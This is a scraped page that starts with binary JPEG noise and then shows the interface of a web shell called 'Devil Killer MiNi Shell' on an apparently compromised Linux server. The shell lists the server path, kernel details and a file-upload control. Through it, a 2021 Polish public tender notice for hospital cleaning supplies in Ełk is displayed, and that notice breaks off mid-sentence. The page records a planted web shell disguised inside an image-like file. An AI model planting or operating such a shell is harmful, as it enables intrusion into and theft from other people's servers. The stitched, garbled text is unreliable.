JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211122/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211122/0027837602-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa środków gospodarczych i czystości oraz sprzętu do sprzątania na potrzeby &#34;Pro-Medica&#34; w Ełku Sp. z o.o. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">&#34;PRO-MEDICA&#34; W EŁKU SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510996861</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Baranki 24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ełk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">19-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL623 - Ełcki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@szpital.elk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.promedica.elk.com.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa środków gospodarczych i czystości oraz sprzętu do sprzątania na potrzeby &#34;Pro-Medica&#34; w Ełku Sp. z o.o. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-eb61972c-4b79-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00278376</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-eb61972c-4b79-11ec-8c2d-66c2f1230e9c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://platformazakupowa.pl/pn/promedica_elk</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowaniu odbywa się przy użyciu następujących środków komunikacji elektronicznej tj.: Platformy<br/>do obsługi postępowań przetargowych, dostępnej pod adresem:<br/>http://platformazakupowa.pl/pn/promedica_elk<br/>- oferta, musi zostać przekazana wyłącznie za pomocą powyższej Platformy.<br/>2. Szczegółowe wymagania techniczne i sprzętowe dla Platformy określa SWZ.<br/>3. W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem<br/>przedmiotowego postępowania.<br/>4. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p.,<br/>podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby<br/>sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w<br/>formatach .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>5. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z<br/>formatów:<br/>a) .zip<br/>b) .7Z<br/>6. Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp<br/>.numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>7. Ofertę, a także oświadczenie o jakim mowa w Rozdziale IX ust. 1 SWZ składa się, pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.<br/>8 . Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują poprzez Platformę.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13<br/>ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016r., str. 1), dalej „RODO”, informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest „Pro-Medica” w Ełku Sp. z o.o. 19- 300 Ełk, ul.<br/>Baranki 24;<br/>2) inspektorem ochrony danych osobowych w „Pro-Medica” w Ełku Sp. z o.o. jest Pan Wiesław<br/>Skoczyński, kontakt: telefon: 691-366-446, adres e-mail: skoczynski.w@szpital.elk.pl;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie<br/>podstawowym bez negocjacji;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy p.z.p,<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu :<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00- 193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">5091/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">9</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 1 - Mopy i ściereczki </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39525800-6 - Ściereczki do czyszczenia</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">19520000-7 - Produkty z tworzyw sztucznych</p> <p class="mb-0">39525100-9 - Ściereczki do kurzu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze i ocenie oferty najkorzystniejszej Zamawiający będzie<br/>postępował zgodnie z wymaganiami ustawy Pzp oraz kierował się kryteriami oceny ofert określonymi w<br/>niniejszej SWZ.<br/>2. Przy wyborze oferty w danym Pakiecie Zamawiający będzie kierował się kryterium najniższej ceny.<br/>3. Zamawiający wybierze ofertę z najniższą ceną brutto spośród wszystkich złożonych ofert<br/>niepodlegających odrzuceniu.<br/>4. Każdy Pakiet podlegać będzie odrębnej ocenie.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w Ustawie Pzp oraz w SWZ i zostanie oceniona jako najkorzystniejsza w<br/>oparciu o podane kryteria wyboru.<br/>6. W sytuacji gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu<br/>na to, że zostały złożone oferty o takiej samej cenie wezwie on Wykonawców którzy złożyli te oferty,<br/>do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Wykonawcy składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w<br/>uprzednio złożonych przez nich ofertach.<br/>7. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących<br/>treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są<br/>zobowiązani do przedstawienie wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>8. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w Rozdziale<br/>XVI SWZ.<br/>9. Jeżeli termin związania oferta upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie<br/>Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez<br/>Zamawiającego terminie, pisemnej zgodny na wybór jego oferty.<br/>10. W przypadku braku zgody, o której mowa w punkcie powyżej oferta podlega odrzuceniu,<br/>zamawiający zwraca się o wyrażenie takiej zgody do kolejnego wykonawcy, którego oferta została<br/>najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 2 - Worki foliowe </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">18930000-7 - Worki i torby</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze i ocenie oferty najkorzystniejszej Zamawiający będzie<br/>postępował zgodnie z wymaganiami ustawy Pzp oraz kierował się kryteriami oceny ofert określonymi w<br/>niniejszej SWZ.<br/>2. Przy wyborze oferty w danym Pakiecie Zamawiający będzie kierował się kryterium najniższej ceny.<br/>3. Zamawiający wybierze ofertę z najniższą ceną brutto spośród wszystkich złożonych ofert<br/>niepodlegających odrzuceniu.<br/>4. Każdy Pakiet podlegać będzie odrębnej ocenie.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w Ustawie Pzp oraz w SWZ i zostanie oceniona jako najkorzystniejsza w<br/>oparciu o podane kryteria wyboru.<br/>6. W sytuacji gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu<br/>na to, że zostały złożone oferty o takiej samej cenie wezwie on Wykonawców którzy złożyli te oferty,<br/>do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Wykonawcy składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w<br/>uprzednio złożonych przez nich ofertach.<br/>7. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących<br/>treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są<br/>zobowiązani do przedstawienie wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>8. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w Rozdziale<br/>XVI SWZ.<br/>9. Jeżeli termin związania oferta upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie<br/>Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez<br/>Zamawiającego terminie, pisemnej zgodny na wybór jego oferty.<br/>10. W przypadku braku zgody, o której mowa w punkcie powyżej oferta podlega odrzuceniu,<br/>zamawiający zwraca się o wyrażenie takiej zgody do kolejnego wykonawcy, którego oferta została<br/>najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 3 - Ręczniki i papier toaletowy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33763000-6 - Ręczniki papierowe do rąk</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33761000-2 - Papier toaletowy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze i ocenie oferty najkorzystniejszej Zamawiający będzie<br/>postępował zgodnie z wymaganiami ustawy Pzp oraz kierował się kryteriami oceny ofert określonymi w<br/>niniejszej SWZ.<br/>2. Przy wyborze oferty w danym Pakiecie Zamawiający będzie kierował się kryterium najniższej ceny.<br/>3. Zamawiający wybierze ofertę z najniższą ceną brutto spośród wszystkich złożonych ofert<br/>niepodlegających odrzuceniu.<br/>4. Każdy Pakiet podlegać będzie odrębnej ocenie.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w Ustawie Pzp oraz w SWZ i zostanie oceniona jako najkorzystniejsza w<br/>oparciu o podane kryteria wyboru.<br/>6. W sytuacji gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu<br/>na to, że zostały złożone oferty o takiej samej cenie wezwie on Wykonawców którzy złożyli te oferty,<br/>do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Wykonawcy składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w<br/>uprzednio złożonych przez nich ofertach.<br/>7. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących<br/>treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są<br/>zobowiązani do przedstawienie wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>8. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w Rozdziale<br/>XVI SWZ.<br/>9. Jeżeli termin związania oferta upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie<br/>Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez<br/>Zamawiającego terminie, pisemnej zgodny na wybór jego oferty.<br/>10. W przypadku braku zgody, o której mowa w punkcie powyżej oferta podlega odrzuceniu,<br/>zamawiający zwraca się o wyrażenie takiej zgody do kolejnego wykonawcy, którego oferta została<br/>najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 4 - Akcesoria pomocnicze </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39224000-8 - Miotły i szczotki i inne artykuły różnego rodzaju</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">19520000-7 - Produkty z tworzyw sztucznych</p> <p class="mb-0">39224300-1 - Miotły i szczotki i inne artykuły do sprzątania w gospodarstwie domowym</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze i ocenie oferty najkorzystniejszej Zamawiający będzie<br/>postępował zgodnie z wymaganiami ustawy Pzp oraz kierował się kryteriami oceny ofert określonymi w<br/>niniejszej SWZ.<br/>2. Przy wyborze oferty w danym Pakiecie Zamawiający będzie kierował się kryterium najniższej ceny.<br/>3. Zamawiający wybierze ofertę z najniższą ceną brutto spośród wszystkich złożonych ofert<br/>niepodlegających odrzuceniu.<br/>4. Każdy Pakiet podlegać będzie odrębnej ocenie.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w Ustawie Pzp oraz w SWZ i zostanie oceniona jako najkorzystniejsza w<br/>oparciu o podane kryteria wyboru.<br/>6. W sytuacji gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu<br/>na to, że zostały złożone oferty o takiej samej cenie wezwie on Wykonawców którzy złożyli te oferty,<br/>do złożenia w 